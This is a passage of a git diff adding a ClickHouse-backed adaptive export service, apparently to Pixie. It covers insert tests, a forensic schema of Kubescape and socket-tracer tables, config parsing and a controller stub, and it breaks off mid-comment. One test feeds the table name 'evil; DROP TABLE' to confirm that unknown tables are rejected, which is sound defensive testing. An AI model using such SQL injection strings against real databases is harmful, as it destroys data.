a/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go new file mode 100644 index 00000000000..ee66a17a85d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go @@ -0,0 +1,109 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestColumns_AdaptiveAttribution — the operator's only write target. +// Column list must match the DDL exactly so the sink can append values +// in the right positional order. 
+func TestColumns_AdaptiveAttribution(t *testing.T) { + cols, err := Columns("adaptive_attribution") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + "last_rule_id", "n_anomalies", + } + if len(cols) != len(want) { + t.Fatalf("Columns(adaptive_attribution) length %d, want %d; got %v", len(cols), len(want), cols) + } + for i, c := range want { + if cols[i] != c { + t.Fatalf("col[%d] = %q, want %q (full=%v)", i, cols[i], c, cols) + } + } +} + +// TestColumns_PixieTablesIncludeNamespaceAndPod — every pixie table's +// column list contains namespace + pod (the JOIN keys against +// adaptive_attribution). +func TestColumns_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, table := range PixieTables() { + t.Run(table, func(t *testing.T) { + cols, err := Columns(table) + if err != nil { + t.Fatalf("Columns(%q): %v", table, err) + } + if !contains(cols, "namespace") { + t.Fatalf("%s missing namespace; cols=%v", table, cols) + } + if !contains(cols, "pod") { + t.Fatalf("%s missing pod; cols=%v", table, cols) + } + if contains(cols, "anomaly_hash") || contains(cols, "anomaly_hashes") { + t.Fatalf("%s must not carry hash inline; cols=%v", table, cols) + } + }) + } +} + +// TestInsertSQL_AdaptiveAttribution — the canonical INSERT used by the sink. +func TestInsertSQL_AdaptiveAttribution(t *testing.T) { + sql, err := InsertSQL("adaptive_attribution") + if err != nil { + t.Fatalf("InsertSQL: %v", err) + } + if !strings.HasPrefix(sql, "INSERT INTO forensic_db.adaptive_attribution (") { + t.Fatalf("bad prefix: %q", sql) + } + if !strings.HasSuffix(sql, ") VALUES") { + t.Fatalf("bad suffix: %q", sql) + } +} + +// TestInsertSQL_DottedTablesBacktickQuoted — INSERT statements for +// dotted ClickHouse identifiers must wrap the name in backticks. +func TestInsertSQL_DottedTablesBacktickQuoted(t *testing.T) { + for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(table, func(t *testing.T) { + sql, err := InsertSQL(table) + if err != nil { + t.Fatalf("InsertSQL(%q): %v", table, err) + } + if !strings.Contains(sql, "INSERT INTO forensic_db.`"+table+"` (") { + t.Fatalf("dotted table %q not backtick-quoted: %q", table, sql) + } + }) + } +} + +// TestInsertSQL_Unknown — defensive contract. +func TestInsertSQL_Unknown(t *testing.T) { + for _, bad := range []string{"", "evil; DROP TABLE"} { + _, err := InsertSQL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("InsertSQL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql new file mode 100644 index 00000000000..69c5021c5ea --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql @@ -0,0 +1,399 @@ +-- Forensic SOC ClickHouse schema (adaptive-write feature, design rev 2) +-- ---------------------------------------------------------------------- +-- Pixie type map (PixieTypeToClickHouseType): +-- TIME64NS → DateTime64(9), except event_time → DateTime64(3) +-- INT64 → Int64 | FLOAT64 → Float64 | STRING → String +-- BOOLEAN → UInt8 | UINT128 → String +-- Pixie's retention plugin adds: hostname String, event_time DateTime64(3) +-- We add: namespace String, pod String (used by adaptive_attribution JOINs). 
+-- +-- Engine convention for pixie observation tables: +-- ENGINE = MergeTree() +-- PARTITION BY toYYYYMM(event_time) +-- ORDER BY (hostname, event_time) +-- +-- The hash IS NOT stored on pixie observation rows. Attribution is via JOIN +-- against forensic_db.adaptive_attribution on (hostname, namespace, pod, time_). +-- See the adaptive_attribution definition at the bottom of this file. + +CREATE DATABASE IF NOT EXISTS forensic_db; + +-- Kubescape alerts (Vector kubescape_to_alerts sink, unchanged). +CREATE TABLE IF NOT EXISTS forensic_db.alerts ( + timestamp DateTime64(3), + ingest_time DateTime64(3) DEFAULT now64(3), + rule_id LowCardinality(String), + alert_name LowCardinality(String), + severity UInt8, + unique_id String, + cluster_name LowCardinality(String), + namespace LowCardinality(String), + pod_name String, + container_name LowCardinality(String), + container_id String, + workload_name LowCardinality(String), + workload_kind LowCardinality(String), + image LowCardinality(String), + infected_pid UInt32, + process_name LowCardinality(String), + process_cmdline String, + message String, + raw_event String +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(timestamp) + ORDER BY (timestamp, severity, namespace, rule_id) + TTL toDateTime(timestamp) + INTERVAL 90 DAY DELETE + SETTINGS index_granularity = 8192, ttl_only_drop_parts = 1; + +-- Kubescape raw logs — Vector kubescape_enrich sink writes here, the operator's +-- trigger reads it. anomaly_hash column kept here as DEFAULT '' for backwards +-- compat with any existing Vector pipeline that already populates it; the +-- operator does not depend on it being non-empty. +CREATE TABLE IF NOT EXISTS forensic_db.kubescape_logs ( + BaseRuntimeMetadata String, + CloudMetadata String, + RuleID String, + RuntimeK8sDetails String, + RuntimeProcessDetails String, + event String, + event_time UInt64, + hostname String, + level String DEFAULT '', + message String DEFAULT '', + msg String DEFAULT '', + processtree_depth String DEFAULT '', + anomaly_hash String DEFAULT '' +) ENGINE = MergeTree() + ORDER BY (event_time, hostname) + PARTITION BY toYYYYMM(toDateTime(event_time)) + TTL toDateTime(event_time) + INTERVAL 30 DAY DELETE + SETTINGS index_granularity = 8192; + +-- ============================================================================ +-- 12 Pixie socket_tracer tables — strongly predefined, namespace + pod added. +-- The retention scripts (PxL, user-defined or shipped defaults) MUST populate +-- namespace + pod via px.upid_to_namespace / px.upid_to_pod_name.
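+-- A PxL sketch of that shape (mirrors the operator's builtinPresetScripts;
+-- the -15s window is the operator default, not a requirement):
+--
+--   import px
+--   df = px.DataFrame(table='redis_events', start_time='-15s')
+--   df.namespace = px.upid_to_namespace(df.upid)
+--   df.pod = px.upid_to_pod_name(df.upid)
+--   px.display(df, 'redis_events')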
+-- ============================================================================ + +-- http_events — pixie/src/stirling/source_connectors/socket_tracer/http_table.h +CREATE TABLE IF NOT EXISTS forensic_db.http_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + major_version Int64, + minor_version Int64, + content_type Int64, + req_headers String, + req_method String, + req_path String, + req_body String, + req_body_size Int64, + resp_headers String, + resp_status Int64, + resp_message String, + resp_body String, + resp_body_size Int64, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- http2_messages.beta — http2_messages_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`http2_messages.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + stream_id Int64, + headers String, + body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- dns_events — dns_table.h +CREATE TABLE IF NOT EXISTS forensic_db.dns_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_header String, + req_body String, + resp_header String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- redis_events — redis_table.h +CREATE TABLE IF NOT EXISTS forensic_db.redis_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_args String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mysql_events — mysql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mysql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + req_body String, + resp_status Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- pgsql_events — pgsql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.pgsql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- cql_events — cass_table.h +CREATE TABLE IF NOT EXISTS forensic_db.cql_events ( + 
time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_op Int64, + req_body String, + resp_op Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mongodb_events — mongodb_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mongodb_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_body String, + resp_status String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- kafka_events.beta — kafka_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`kafka_events.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + client_id String, + req_body String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- amqp_events — amqp_table.h +CREATE TABLE IF NOT EXISTS forensic_db.amqp_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + frame_type Int64, + channel Int64, + method String, + payload String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mux_events — mux_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mux_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_type Int64, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- tls_events — tls_table.h +CREATE TABLE IF NOT EXISTS forensic_db.tls_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + version Int64, + content_type Int64, + handshake String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- ============================================================================ +-- adaptive_attribution — operator's only write target in ClickHouse. +-- +-- One row per active anomaly hash per node. The operator inserts one row +-- per arriving kubescape_log on its node. ReplacingMergeTree(t_end) collapses +-- re-inserts to the row with the largest t_end — so each fresh anomaly with +-- the same hash extends the active window automatically; stale rows merge +-- away. 
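+--
+-- For example (illustrative timestamps), two inserts sharing one
+-- (hostname, anomaly_hash) sorting key:
+--
+--   INSERT ... t_end = '2025-04-12 17:02:40'  -- first anomaly on the hash
+--   INSERT ... t_end = '2025-04-12 17:07:10'  -- repeat a few minutes later
+--
+-- After a background merge (or SELECT ... FINAL), only the row with the
+-- larger t_end survives.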
+--
+-- Analyst joins. ASOF JOIN (INNER semantics) matches each observation row
+-- to the attribution row with the greatest t_start <= time_; '<hash>' is a
+-- placeholder for the anomaly hash under investigation:
+--
+--   SELECT he.*, attr.anomaly_hash
+--   FROM forensic_db.http_events he
+--   ASOF JOIN forensic_db.adaptive_attribution attr
+--     ON he.hostname = attr.hostname
+--    AND he.namespace = attr.namespace
+--    AND he.pod = attr.pod
+--    AND he.time_ >= attr.t_start
+--   WHERE he.time_ <= attr.t_end
+--     AND attr.anomaly_hash = '<hash>';
+--
+-- Boot-time rehydration of the operator's in-memory active set
+-- ('<hostname>' is the operator's own node):
+--
+--   SELECT * FROM forensic_db.adaptive_attribution FINAL
+--   WHERE hostname = '<hostname>' AND t_end > now64(9);
+--
+-- DateTime64(9, 'UTC') — pin the tz so bare-string serialization is
+-- unambiguous; without it, CH parses incoming timestamps in the
+-- server-session timezone and silently shifts values on non-UTC hosts.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.adaptive_attribution (
+    anomaly_hash String,
+    namespace String,
+    pod String,
+    comm String,
+    pid UInt64,
+    hostname String,
+    t_start DateTime64(9, 'UTC'),
+    t_end DateTime64(9, 'UTC'),
+    last_seen DateTime64(9, 'UTC'),
+    last_rule_id String,
+    n_anomalies UInt64
+) ENGINE = ReplacingMergeTree(t_end)
+  PARTITION BY toYYYYMM(t_start)
+  ORDER BY (hostname, anomaly_hash);
diff --git a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
index 4d19f27afab..393e71fe298 100644
--- a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
@@ -18,17 +18,12 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library")
 
 go_library(
     name = "config",
-    srcs = [
-        "config.go",
-        "definition.go",
-    ],
+    srcs = ["config.go"],
     importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/config",
     visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
     deps = [
         "//src/utils/shared/k8s",
-        "//src/vizier/services/adaptive_export/internal/script",
         "@com_github_sirupsen_logrus//:logrus",
-        "@in_gopkg_yaml_v2//:yaml_v2",
         "@io_k8s_apimachinery//pkg/apis/meta/v1:meta",
         "@io_k8s_client_go//kubernetes",
         "@io_k8s_client_go//rest",
diff --git a/src/vizier/services/adaptive_export/internal/config/config.go b/src/vizier/services/adaptive_export/internal/config/config.go
index fc500359dfe..7c518513d9a 100644
--- a/src/vizier/services/adaptive_export/internal/config/config.go
+++ b/src/vizier/services/adaptive_export/internal/config/config.go
@@ -33,20 +33,39 @@ import (
 )
 
 const (
-	envVerbose           = "VERBOSE"
-	envClickHouseDSN     = "CLICKHOUSE_DSN"
-	envPixieClusterID    = "PIXIE_CLUSTER_ID"
-	envPixieEndpoint     = "PIXIE_ENDPOINT"
-	envPixieAPIKey       = "PIXIE_API_KEY"
-	envClusterName       = "CLUSTER_NAME"
-	envCollectInterval   = "COLLECT_INTERVAL_SEC"
-	envDetectionInterval = "DETECTION_INTERVAL_SEC"
-	envDetectionLookback = "DETECTION_LOOKBACK_SEC"
-	defPixieHostname     = "work.withpixie.ai:443"
-	boolTrue             = "true"
-	defCollectInterval   = 30
-	defDetectionInterval = 10
-	defDetectionLookback = 15
+	envVerbose           = "VERBOSE"
+	envClickHouseDSN     = "CLICKHOUSE_DSN"
+	envClickHouseHost    = "CLICKHOUSE_HOST"
+	envClickHousePort    = "CLICKHOUSE_PORT"
+	envClickHouseUser    = "CLICKHOUSE_USER"
+	envClickHousePass    = "CLICKHOUSE_PASSWORD"
+	envClickHouseDB      = "CLICKHOUSE_DATABASE"
+	envKubescapeTable    = "KUBESCAPE_TABLE"
+	envPixieClusterID    = "PIXIE_CLUSTER_ID"
+	envPixieEndpoint     = "PIXIE_ENDPOINT"
+	envPixieAPIKey       = "PIXIE_API_KEY"
+	envClusterName       = "CLUSTER_NAME"
+	envCollectInterval   = "COLLECT_INTERVAL_SEC"
+	envDetectionInterval =
"DETECTION_INTERVAL_SEC" + envDetectionLookback = "DETECTION_LOOKBACK_SEC" + envExportMode = "EXPORT_MODE" + envExportQuietTicks = "EXPORT_QUIET_TICKS" + defPixieHostname = "work.pixie.austrianopencloudcommunity.org:443" + defClickHousePort = "9000" + defKubescapeTable = "kubescape_logs" + defExportMode = "auto" + defExportQuietTicks = 6 + boolTrue = "true" + defCollectInterval = 30 + defDetectionInterval = 10 + defDetectionLookback = 15 +) + +// ExportMode values. +const ( + ExportModeAuto = "auto" + ExportModeAlways = "always" + ExportModeNever = "never" ) var ( @@ -206,6 +225,32 @@ func setUpConfig() error { return err } + exportQuietTicks, err := getIntEnvWithDefault(envExportQuietTicks, defExportQuietTicks) + if err != nil { + return err + } + + exportMode := strings.ToLower(getEnvWithDefault(envExportMode, defExportMode)) + switch exportMode { + case ExportModeAuto, ExportModeAlways, ExportModeNever: + default: + return fmt.Errorf("invalid %s=%q (must be auto|always|never)", envExportMode, exportMode) + } + + // Parse the DSN into its parts; individual env vars override the parsed values. + dsnHost, dsnPort, dsnUser, dsnPass, dsnDB := parseDSN(clickhouseDSN) + chHost := getEnvWithDefault(envClickHouseHost, dsnHost) + chPort := getEnvWithDefault(envClickHousePort, firstNonEmpty(dsnPort, defClickHousePort)) + chUser := getEnvWithDefault(envClickHouseUser, dsnUser) + chPass := getEnvWithDefault(envClickHousePass, dsnPass) + chDB := getEnvWithDefault(envClickHouseDB, dsnDB) + chTable := getEnvWithDefault(envKubescapeTable, defKubescapeTable) + + // If individual fields were provided but CLICKHOUSE_DSN was not, build one. + if clickhouseDSN == "" && chHost != "" && chUser != "" { + clickhouseDSN = fmt.Sprintf("%s:%s@%s:%s/%s", chUser, chPass, chHost, chPort, chDB) + } + instance = &config{ settings: &settings{ buildDate: buildDate, @@ -213,14 +258,22 @@ func setUpConfig() error { version: integrationVersion, }, worker: &worker{ - clusterName: clusterName, - pixieClusterID: pixieClusterID, - collectInterval: collectInterval, - detectionInterval: detectionInterval, - detectionLookback: detectionLookback, + clusterName: clusterName, + pixieClusterID: pixieClusterID, + collectInterval: collectInterval, + detectionInterval: detectionInterval, + detectionLookback: detectionLookback, + exportMode: exportMode, + exportQuietTicks: exportQuietTicks, }, clickhouse: &clickhouse{ dsn: clickhouseDSN, + host: chHost, + port: chPort, + user: chUser, + password: chPass, + database: chDB, + table: chTable, userAgent: "pixie-clickhouse/" + integrationVersion, }, pixie: &pixie{ @@ -232,6 +285,50 @@ func setUpConfig() error { return instance.validate() } +// parseDSN best-effort splits `user:pass@host:port/db`. Missing parts come back empty. 
+func parseDSN(dsn string) (string, string, string, string, string) { + if dsn == "" { + return "", "", "", "", "" + } + at := strings.LastIndex(dsn, "@") + if at < 0 { + return "", "", "", "", "" + } + creds := dsn[:at] + rest := dsn[at+1:] + + var user, pass string + if i := strings.Index(creds, ":"); i >= 0 { + user = creds[:i] + pass = creds[i+1:] + } else { + user = creds + } + + var db string + if i := strings.Index(rest, "/"); i >= 0 { + db = rest[i+1:] + rest = rest[:i] + } + var host, port string + if i := strings.Index(rest, ":"); i >= 0 { + host = rest[:i] + port = rest[i+1:] + } else { + host = rest + } + return host, port, user, pass, db +} + +func firstNonEmpty(vals ...string) string { + for _, v := range vals { + if v != "" { + return v + } + } + return "" +} + func getEnvWithDefault(key, defaultValue string) string { value := os.Getenv(key) if value == "" { @@ -325,29 +422,46 @@ func (s *settings) BuildDate() string { type ClickHouse interface { DSN() string + Host() string + Port() string + User() string + Password() string + Database() string + Table() string UserAgent() string validate() error } type clickhouse struct { dsn string + host string + port string + user string + password string + database string + table string userAgent string } func (c *clickhouse) validate() error { if c.dsn == "" { - return fmt.Errorf("missing required env variable '%s'", envClickHouseDSN) + return fmt.Errorf("missing required env variable '%s' (or provide %s/%s/%s/%s/%s)", + envClickHouseDSN, envClickHouseHost, envClickHousePort, envClickHouseUser, envClickHousePass, envClickHouseDB) + } + if c.host == "" || c.user == "" || c.database == "" { + return fmt.Errorf("ClickHouse host/user/database could not be derived from %s=%q", envClickHouseDSN, c.dsn) } return nil } -func (c *clickhouse) DSN() string { - return c.dsn -} - -func (c *clickhouse) UserAgent() string { - return c.userAgent -} +func (c *clickhouse) DSN() string { return c.dsn } +func (c *clickhouse) Host() string { return c.host } +func (c *clickhouse) Port() string { return c.port } +func (c *clickhouse) User() string { return c.user } +func (c *clickhouse) Password() string { return c.password } +func (c *clickhouse) Database() string { return c.database } +func (c *clickhouse) Table() string { return c.table } +func (c *clickhouse) UserAgent() string { return c.userAgent } type Pixie interface { APIKey() string @@ -390,15 +504,19 @@ type Worker interface { CollectInterval() int64 DetectionInterval() int64 DetectionLookback() int64 + ExportMode() string + ExportQuietTicks() int64 validate() error } type worker struct { - clusterName string - pixieClusterID string - collectInterval int64 - detectionInterval int64 - detectionLookback int64 + clusterName string + pixieClusterID string + collectInterval int64 + detectionInterval int64 + detectionLookback int64 + exportMode string + exportQuietTicks int64 } func (a *worker) validate() error { @@ -408,22 +526,10 @@ func (a *worker) validate() error { return nil } -func (a *worker) ClusterName() string { - return a.clusterName -} - -func (a *worker) PixieClusterID() string { - return a.pixieClusterID -} - -func (a *worker) CollectInterval() int64 { - return a.collectInterval -} - -func (a *worker) DetectionInterval() int64 { - return a.detectionInterval -} - -func (a *worker) DetectionLookback() int64 { - return a.detectionLookback -} +func (a *worker) ClusterName() string { return a.clusterName } +func (a *worker) PixieClusterID() string { return a.pixieClusterID } +func (a *worker) 
CollectInterval() int64 { return a.collectInterval } +func (a *worker) DetectionInterval() int64 { return a.detectionInterval } +func (a *worker) DetectionLookback() int64 { return a.detectionLookback } +func (a *worker) ExportMode() string { return a.exportMode } +func (a *worker) ExportQuietTicks() int64 { return a.exportQuietTicks } diff --git a/src/vizier/services/adaptive_export/internal/config/definition.go b/src/vizier/services/adaptive_export/internal/config/definition.go deleted file mode 100644 index fd772022753..00000000000 --- a/src/vizier/services/adaptive_export/internal/config/definition.go +++ /dev/null @@ -1,66 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package config - -import ( - "io/ioutil" - "os" - "path/filepath" - "strings" - - "gopkg.in/yaml.v2" - - "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" -) - -const scriptExtension = ".yaml" - -// ReadScriptDefinitions reads the script definition from the given directory path. -// Only .yaml files are read and subdirectories are not traversed. -func ReadScriptDefinitions(dir string) ([]*script.ScriptDefinition, error) { - if _, err := os.Stat(dir); os.IsNotExist(err) { - return nil, nil - } - files, err := ioutil.ReadDir(dir) - if err != nil { - return nil, err - } - var l []*script.ScriptDefinition - for _, file := range files { - if strings.HasSuffix(file.Name(), scriptExtension) { - description, err := readScriptDefinition(filepath.Join(dir, file.Name())) - if err != nil { - return nil, err - } - l = append(l, description) - } - } - return l, nil -} - -func readScriptDefinition(path string) (*script.ScriptDefinition, error) { - content, err := ioutil.ReadFile(path) - if err != nil { - return nil, err - } - var definition script.ScriptDefinition - err = yaml.Unmarshal(content, &definition) - if err != nil { - return nil, err - } - return &definition, nil -} diff --git a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel new file mode 100644 index 00000000000..62950ba26fa --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel @@ -0,0 +1,43 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "controller", + srcs = ["controller.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/sink", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "controller_test", + srcs = ["controller_test.go"], + embed = [":controller"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/sink", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/controller/controller.go b/src/vizier/services/adaptive_export/internal/controller/controller.go new file mode 100644 index 00000000000..d9bd97e6ae1 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller.go @@ -0,0 +1,420 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package controller orchestrates the adaptive-write push flow on a +// single node: +// +// 1. Subscribe to a Trigger that produces kubescape.Event values. +// 2. For each event, derive the workload anomaly.Target + AnomalyHash, +// look up the in-memory active set for this hostname, and either +// open a new active row or extend an existing one (t_end ← now+after). +// 3. Persist the resulting AttributionRow to ClickHouse via Sink. +// +// The controller does NOT execute PxL itself, does NOT write pixie +// observation rows, and does NOT manage retention scripts. Pixie's +// retention plugin (driven by user-defined PxL scripts in the UI) +// owns those concerns. Operator's only output is forensic_db.adaptive_attribution. +package controller + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Trigger is the source of new kubescape events. +type Trigger interface { + Subscribe(ctx context.Context) (<-chan kubescape.Event, error) +} + +// Sink writes attribution rows to ClickHouse and, on boot, can fetch +// still-active rows so the controller can rehydrate after a crash. +// WritePixieRows is the rev-1 fallback path for environments where +// the cloud's retention plugin can't reach the in-cluster CH (so the +// operator queries pixie itself and pushes rows directly). 
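+// As an illustration (the exact body shape is an assumption; the e2e test
+// only asserts that these fields appear), a Write of one row is expected to
+// reach ClickHouse as a JSONEachRow-style INSERT body like:
+//
+//	{"anomaly_hash":"<hash>","hostname":"node-1","namespace":"redis",
+//	 "pod":"redis-578d5dc9bd-kjj78","comm":"redis-server","pid":106040,...}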
+type Sink interface { + Write(ctx context.Context, rows []sink.AttributionRow) error + QueryActive(ctx context.Context, hostname string) ([]sink.AttributionRow, error) + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// PixieQuerier is the rev-1 path's executor: take a PxL string and +// return the resulting rows. nil disables operator-side pixie pushes +// (rev-2 default — the cloud's plugin handles it). +type PixieQuerier interface { + Query(ctx context.Context, pxl string) ([]map[string]any, error) +} + +// Clock abstracts time for tests. +type Clock interface { + Now() time.Time +} + +// RealClock is the production Clock. +type RealClock struct{} + +// Now returns time.Now(). +func (RealClock) Now() time.Time { return time.Now() } + +// Config tunes the controller. Zero values fall through to safe defaults. +type Config struct { + // Hostname is the node-local key. REQUIRED. + Hostname string + + // Before / After form the time window: t_start = event_time - Before, + // t_end = max(t_end, now + After). Both default to 5 min. + Before time.Duration + After time.Duration + + // PushPixieTables, when non-empty alongside a non-nil Pixie querier, + // makes the controller query pixie for every named table on each + // fresh anomaly window and push the result directly to + // forensic_db.
